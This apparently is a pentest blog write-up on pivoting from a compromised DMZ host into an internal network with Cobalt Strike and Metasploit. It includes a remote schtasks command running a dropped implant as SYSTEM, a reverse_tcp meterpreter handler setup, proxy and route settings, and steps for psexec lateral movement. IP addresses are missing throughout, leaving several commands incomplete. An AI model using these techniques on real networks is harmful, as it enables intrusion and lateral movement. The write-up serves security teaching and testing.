Basic Pivoting with Cobaltstrike and Metasploit

Last week we participated in a virtual network pentest in order to test our skills and the security of the network as well. During the pentest we encountered various problems during the host pivoting, so we wrote down the difficulties that we faced and how to solve them. Among various problems that we have faced was the initial beacon from the DMZ zone. Since, the web delivery could not executed, we have moving into, a powershell script from nishang tool which is created from Nikhil Mittal.
As the most real case scenarios so and this, the internal network seating behind a DMZ zone. So our first objective is to compromise somehow the external DMZ network and then we will use MSF and CobaltStrike to hope between hosts.


CobaltStrike Pivoting

After enumerating the external network which we managed to upload a php file and execute system commands on the remote machine. After enumerating the host, we noted that the AV was disabled and the web delivery executed successfully on the victim.

Figure 1 - Host IP (DMZ)

Figure 2 - Beacon (DMZ)

We will not go through the enumeration process because in this article we want to focus more on how to pivot into internal hosts. Somehow, we noted that our user had “SeImpersonatePrivilege” privilege enabled and after scanning the compromised host we were able to find the credentials in plaintext form from various domain users. One of those users had admin privileges into another domain host ( To move laterally you can use various ways and not only the above that we have used:
·       Create remotely a service into the host
         Create remotely a schedule task into the host
      Psexec etc


Before we moved on laterally, we have to set up a “Pivot” listener to the compromised host. In our case is the

Figure 3 – Setup a pivot listener on (DMZ)

After setup, the new pivot listener of the CobaltStrike automatically executed the rportfwd command.


Figure 5 – Create a stageless executable file on (DMZ) using as stage the new pivot listener

Our malicious executable file was created and we were able to upload it to the remote network resource on Additionally, we have to create a service which is linked with that file in order to get a beacon from the remote host (

Figure 6

Figure 6,7 – Upload the malicious file, create and execute remotely a service (

Figure 8 – Beacon from (PID 12568)

An alternative way of lateral movement is the creation of schedule task

  • schtasks /create /s /ru SYSTEM /sc MINUTE /MO 10 /tn pwned /tr "C:\windows\temp\service01.exe"
  • schtasks /Run /TN pwned /s

Before we moving on, you may think that smb_pipe listener is also a good choice but not in our case because every time we wanted to scan the internal network using smb_pipe listener combined with proxychains, the nmap was throwing errors.

Our next goal is somehow to reach the Now that we have setup our listeners and all are working as intended, we have to set up a socks4 proxy server on the latest listener with PID 12568 in order to scan with Nmap the internal network host.

Figure 9 – Setup socks4a proxy server on (PID 12568)

            Figure 10 – Configure the proxychains on the Kali box. We have used our VPN’s IP address (Attacker IP)

After scanning the internal network host ( we noted that the port 3389 was open and during the enumeration process we were able to find a domain user who had remote desktop privileges on some hosts.

Figure 11 – Execute xfreerdp with proxychains

Figure 12 – RDP connection with

In order to avoid the RDP connection for a long time for various reasons, we have created a new stageless executable file and as a stage listener we have used the “pivot_listener”.

Figure 13 – Create a new stageless executable file

Figure 14 – Grab a beacon from

Metasploit Pivoting
The initial step for getting a shell back does not differ from the cobaltstrike.  That  time we have created an executable file using msfvenom and we have managed to upload it to the remote host which we are able to execute commands remotely.

Figure 1 – Create and upload msf.exe to the remote host (

Figure 2 – Grab a meterpreter connection from the remote host (

Figure 3 – Add routes to Metasploit

To be able to hop from to with metasploit, we have to set the payload option LHOST, which is the ip address from the host that we already have a session (
When we execute our exploit, the MSF will open the port 4445 on the which will wait for a connection.

Figure 4 – Setup psexec on the host

 Figure 5 – Get a meterpreter session from using psexec

The next steps are the same as cobaltstrike’s. We have added our routes, we have a session with the DMZ host & setup socks4 server on our MSF. The only thing that remains is to connect with proxychains & xfreerdp to the host and drop the executable which will give us a meterpreter when is executed.

Sending Meterpreter through Cobaltstrike

Our next question after we successfully setup both frameworks as we wanted was “How we can forward a Meterpreter through Cobaltstrike BUT NOT only the first beacon from DMZ?”

On the following screenshot you can observe the listeners that we have setup on the cobaltstrike.
·       Malakoulis: Grabs a beacon from the DMZ host
·       Pivot: This listener was set up after getting the initial beacon from DMZ host. The traffic to the internal network is going to use this listener.
·       msf_fore: We need this listener to forward the beacon session that we already have with to MSF on port 9999. Don’t forget to setup your MSF on port 9999:

                         User exploit/multi/handler
                         Set payload windows/meterpreter/reverse_tcp ->Lhost: Lport: 9999
             **Very important step after getting the meterpreter session is to add this both routes to MSF
                                        route add
                                        route add

·       msf2: This listener is the most important because it will forward the meterpreter traffic from internal network through beacons to our MSF. That’s why it has different configuration from the previous one. The host is not the attackers IP but the ip of the host in DMZ and the same configuration MUST have the payload on the Meterpreter (LHOST=

Tunnel Meterpreter through Cobaltstrike – Extra Mile

We were able also to tunnel some auxiliary modules through cobaltstrike using the following command
1.       set Proxies socks4:
2.       setg ReverseAllowProxy true



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